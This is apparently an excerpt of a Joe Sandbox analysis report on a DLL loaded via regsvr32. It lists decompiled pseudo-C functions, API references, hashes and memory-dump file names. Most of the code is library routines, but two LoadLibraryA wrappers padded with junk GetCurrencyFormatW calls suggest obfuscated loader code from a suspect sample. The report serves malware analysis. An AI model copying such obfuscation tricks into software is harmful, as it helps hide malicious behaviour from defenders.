                                                                                                            0x1000ba2f
                                                                                                            0x1000ba37
                                                                                                            0x1000ba3a
                                                                                                            0x1000ba46
                                                                                                            0x1000ba4c
                                                                                                            0x1000ba4e
                                                                                                            0x1000ba51
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ba56
                                                                                                            0x1000ba5c
                                                                                                            0x1000ba5c
                                                                                                            0x00000000
                                                                                                            0x1000ba3c

                                                                                                            APIs
                                                                                                              • Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
                                                                                                              • Part of subcall function 10011382: InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
                                                                                                              • Part of subcall function 10011382: LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
                                                                                                              • Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6
                                                                                                              • Part of subcall function 10010657: __EH_prolog3_catch.LIBCMT ref: 1001065E
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 1000BA46
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 1000BA56
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                            • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                            • API String ID: 2853499158-63838506
                                                                                                            • Opcode ID: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
                                                                                                            • Instruction ID: fae18e8e3df8c99190cd81beb17d79f1be991ccf9ce49b00c1c0f37f4cd6cf67
                                                                                                            • Opcode Fuzzy Hash: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
                                                                                                            • Instruction Fuzzy Hash: 97018135204B03AFE322DF60DD05B4F7AD0EF457D1F018818F19AA5565DB30E9409623
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100030AA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100030AA(intOrPtr _a4, intOrPtr _a8) {
				signed int _t7;
				short* _t20;

				_t20 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_t7 = GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return E10020530( *((intOrPtr*)(_a4 + _t7 *  *0x100440d0 * 8)),  *((intOrPtr*)(_a8 + GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 8)));
			}





                                                                                                            0x100030c0
                                                                                                            0x100030ce
                                                                                                            0x1000310d

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100030CE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100030EE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
                                                                                                            • Instruction ID: 846c07d914ee6a27032255a918b4843dc12a0f64b55843b4788eb39cb2351f94
                                                                                                            • Opcode Fuzzy Hash: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
                                                                                                            • Instruction Fuzzy Hash: 7BF0B4312443197FE205D740EC82F927B5DD78A745F010056F700AF0E2CB6338248FA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002BDD1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E1002BDD1() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x10039fd0;
					_v28 =  *0x10039fc8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                            0x1002bdd6
                                                                                                            0x1002bdde
                                                                                                            0x1002bdf5
                                                                                                            0x1002bda1
                                                                                                            0x1002bdaa
                                                                                                            0x1002bdb6
                                                                                                            0x1002bdb9
                                                                                                            0x1002bdbc
                                                                                                            0x1002bdbe
                                                                                                            0x1002bdc1
                                                                                                            0x1002bdc6
                                                                                                            0x1002bdd0
                                                                                                            0x1002bdc8
                                                                                                            0x1002bdcc
                                                                                                            0x1002bdcc
                                                                                                            0x1002bde0
                                                                                                            0x1002bde6
                                                                                                            0x1002bdee
                                                                                                            0x00000000
                                                                                                            0x1002bdf0
                                                                                                            0x1002bdf0
                                                                                                            0x1002bdf4
                                                                                                            0x1002bdf4
                                                                                                            0x1002bdee

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,1002361A), ref: 1002BDD6
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1002BDE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                            • Opcode ID: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
                                                                                                            • Instruction ID: e32e5489c0f8680f0bdbeaaa6a49d62586903b2bdf2b5a8f28566646894aba65
                                                                                                            • Opcode Fuzzy Hash: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
                                                                                                            • Instruction Fuzzy Hash: 94F03A20A00E1ADAEF01ABA1AD492EF7BB8FB84746F9245A0D592E4099EF318074D251
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003057 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10003057(CHAR* _a4) {
				signed int _t2;

				_t2 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return  &((LoadLibraryA(_a4))[_t2 *  *0x100440d0]);
			}




                                                                                                            0x10003070
                                                                                                            0x1000308f

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003070
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 10003086
                                                                                                            Strings
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 1000305D
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10003064
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormatLibraryLoad
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 1566795320-3161301136
                                                                                                            • Opcode ID: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
                                                                                                            • Instruction ID: c8b8bc68fb586c21cf620b45a97a61bfa4732d23f622789b4932f32e46aada1a
                                                                                                            • Opcode Fuzzy Hash: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
                                                                                                            • Instruction Fuzzy Hash: 37D05E32644230BAE2125790AD4AFC2AB14E75A752F028004FB04FD5E1C36004A08EA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10018DA4 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E10018DA4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				intOrPtr _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x10045580; // 0x8f64cb61
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E1001FBC4(E100344DD, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x1003b18c,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E100157C0( &_a12,  &_a20, 0x1003b8b8);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E100157C0( &_a12,  &_a68, 0x1003b8a0);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x1003b39c, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E1001FBB5(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x1003b37c);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x1003b4bc);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E10004D4A(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E100185F7(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E100159E9(__ecx, __eax);
						}
						__eax = E10004D4A(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E10014659(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E10020F40(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E10018619( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E100159A6(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E10004D4A(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E1001B8FB(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E1000911A( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E1001B823( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								_v168 = 0x100442e0;
								E100209E8( &_v168, 0x1003e1e4);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_v176 = 0x10044378;
								E100209E8( &_v176, 0x1003e298);
								asm("int3");
								_push(_t229);
								_push(_t188);
								_v184 = 0x10044410;
								E100209E8( &_v184, 0x1003e2dc);
								asm("int3");
								_push(4);
								E1001FBC4(E10032E9B, _t181, 0, _t222);
								_t214 = E100105C8(0x104);
								_v196 = _t214;
								_t179 = 0;
								_v184 = 0;
								if(_t214 != 0) {
									_t179 = E1000E58E(_t214);
								}
								return E1001FC9C(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}



















































                                                                                                            0x10018da4
                                                                                                            0x10018da4
                                                                                                            0x10018da5
                                                                                                            0x10018da8
                                                                                                            0x10018dac
                                                                                                            0x10018db3
                                                                                                            0x10018db6
                                                                                                            0x10018dbd
                                                                                                            0x10018dc2
                                                                                                            0x10018dc7
                                                                                                            0x10018dd2
                                                                                                            0x10018dd5
                                                                                                            0x10018f1a
                                                                                                            0x10018f1d
                                                                                                            0x10018f1f
                                                                                                            0x10018f2e
                                                                                                            0x10018f38
                                                                                                            0x10018f3b
                                                                                                            0x10018f3d
                                                                                                            0x10018f4e
                                                                                                            0x10018f53
                                                                                                            0x10018f62
                                                                                                            0x10018f65
                                                                                                            0x10018f68
                                                                                                            0x10018f6f
                                                                                                            0x10018f72
                                                                                                            0x10018f79
                                                                                                            0x10018f7e
                                                                                                            0x10018f81
                                                                                                            0x10018f88
                                                                                                            0x10018f8e
                                                                                                            0x10018f95
                                                                                                            0x10018f98
                                                                                                            0x10018f9f
                                                                                                            0x10018fa2
                                                                                                            0x10018faf
                                                                                                            0x10018fb1
                                                                                                            0x10018fb3
                                                                                                            0x10018fcc
                                                                                                            0x10018fcf
                                                                                                            0x10018fd2
                                                                                                            0x10018fd8
                                                                                                            0x10018fdf
                                                                                                            0x10018fe2
                                                                                                            0x10018fe5
                                                                                                            0x10018feb
                                                                                                            0x10018fee
                                                                                                            0x10018ff0
                                                                                                            0x10018ff3
                                                                                                            0x10019009
                                                                                                            0x1001900c
                                                                                                            0x1001900f
                                                                                                            0x10019012
                                                                                                            0x10019015
                                                                                                            0x10019018
                                                                                                            0x1001901e
                                                                                                            0x00000000
                                                                                                            0x10018ff5
                                                                                                            0x10018ff5
                                                                                                            0x10018ffb
                                                                                                            0x10018ffb
                                                                                                            0x00000000
                                                                                                            0x10018fb5
                                                                                                            0x10018fb5
                                                                                                            0x10018fbb
                                                                                                            0x10018fbe
                                                                                                            0x10018fbe
                                                                                                            0x10018fb3
                                                                                                            0x10018f21
                                                                                                            0x10018f21
                                                                                                            0x10018f21
                                                                                                            0x00000000
                                                                                                            0x10018ddb
                                                                                                            0x10018ddb
                                                                                                            0x10018dde
                                                                                                            0x10018de0
                                                                                                            0x10018dea
                                                                                                            0x10018ded
                                                                                                            0x10018def
                                                                                                            0x10018df2
                                                                                                            0x100190e2
                                                                                                            0x100190e5
                                                                                                            0x100190ed
                                                                                                            0x100190ee
                                                                                                            0x100190ef
                                                                                                            0x100190f5
                                                                                                            0x100190fa
                                                                                                            0x100190fe
                                                                                                            0x10018df8
                                                                                                            0x10018df8
                                                                                                            0x10018dfb
                                                                                                            0x10018dfd
                                                                                                            0x10018e00
                                                                                                            0x10018e01
                                                                                                            0x10018e06
                                                                                                            0x10018e09
                                                                                                            0x10018e0b
                                                                                                            0x10018e0d
                                                                                                            0x10018e10
                                                                                                            0x10018e13
                                                                                                            0x10018e14
                                                                                                            0x10018e19
                                                                                                            0x10018e1c
                                                                                                            0x10018e1e
                                                                                                            0x10018e22
                                                                                                            0x10018e24
                                                                                                            0x10018e26
                                                                                                            0x10018e29
                                                                                                            0x10018e2b
                                                                                                            0x10018e2f
                                                                                                            0x10018e32
                                                                                                            0x10018e32
                                                                                                            0x10018e3a
                                                                                                            0x10018e3d
                                                                                                            0x10018e40
                                                                                                            0x10018e43
                                                                                                            0x10018e43
                                                                                                            0x10018e46
                                                                                                            0x10018e49
                                                                                                            0x10018e4c
                                                                                                            0x10018e4c
                                                                                                            0x10018e51
                                                                                                            0x10018e56
                                                                                                            0x10018e59
                                                                                                            0x10018e67
                                                                                                            0x10018e67
                                                                                                            0x10018e5b
                                                                                                            0x10018e5e
                                                                                                            0x10018e60
                                                                                                            0x10018e60
                                                                                                            0x10018e69
                                                                                                            0x10018e6c
                                                                                                            0x10018e6f
                                                                                                            0x10018e72
                                                                                                            0x10018e75
                                                                                                            0x10018e78
                                                                                                            0x10018e7a
                                                                                                            0x10018e7c
                                                                                                            0x10018e7e
                                                                                                            0x10018e83
                                                                                                            0x10018e83
                                                                                                            0x10018e8a
                                                                                                            0x10018e8f
                                                                                                            0x10018e92
                                                                                                            0x10018ea3
                                                                                                            0x10018ea3
                                                                                                            0x10018e94
                                                                                                            0x10018e9a
                                                                                                            0x10018e9c
                                                                                                            0x10018e9c
                                                                                                            0x10018ea5
                                                                                                            0x10018ea8
                                                                                                            0x10018eab
                                                                                                            0x10018ead
                                                                                                            0x10018eb4
                                                                                                            0x10018eb7
                                                                                                            0x10018eba
                                                                                                            0x10018ebd
                                                                                                            0x10018ec0
                                                                                                            0x10018ec3
                                                                                                            0x10018ec8
                                                                                                            0x10018ecb
                                                                                                            0x10018ed7
                                                                                                            0x10018edb
                                                                                                            0x10018ee1
                                                                                                            0x10018ee3
                                                                                                            0x10018ee5
                                                                                                            0x10018ee8
                                                                                                            0x10018eed
                                                                                                            0x10018ef7
                                                                                                            0x10018efd
                                                                                                            0x10018f02
                                                                                                            0x10018f08
                                                                                                            0x10018f0d
                                                                                                            0x10018f10
                                                                                                            0x10019021
                                                                                                            0x10019021
                                                                                                            0x10019024
                                                                                                            0x10019027
                                                                                                            0x10019029
                                                                                                            0x10019029
                                                                                                            0x1001902b
                                                                                                            0x1001902d
                                                                                                            0x10019033
                                                                                                            0x10019036
                                                                                                            0x10019038
                                                                                                            0x1001903b
                                                                                                            0x10019048
                                                                                                            0x10019048
                                                                                                            0x1001903d
                                                                                                            0x10019041
                                                                                                            0x10019041
                                                                                                            0x1001904a
                                                                                                            0x10019051
                                                                                                            0x10019054
                                                                                                            0x1001905b
                                                                                                            0x1001905e
                                                                                                            0x1001905e
                                                                                                            0x1001902b
                                                                                                            0x10019063
                                                                                                            0x10019066
                                                                                                            0x10019068
                                                                                                            0x1001906a
                                                                                                            0x1001906d
                                                                                                            0x10019074
                                                                                                            0x10019075
                                                                                                            0x1001907b
                                                                                                            0x1001907e
                                                                                                            0x10019086
                                                                                                            0x10019088
                                                                                                            0x1001908b
                                                                                                            0x1001908d
                                                                                                            0x10019090
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019097
                                                                                                            0x100190a4
                                                                                                            0x100190ab
                                                                                                            0x100190b2
                                                                                                            0x100190b5
                                                                                                            0x100190b8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019094
                                                                                                            0x100190ba
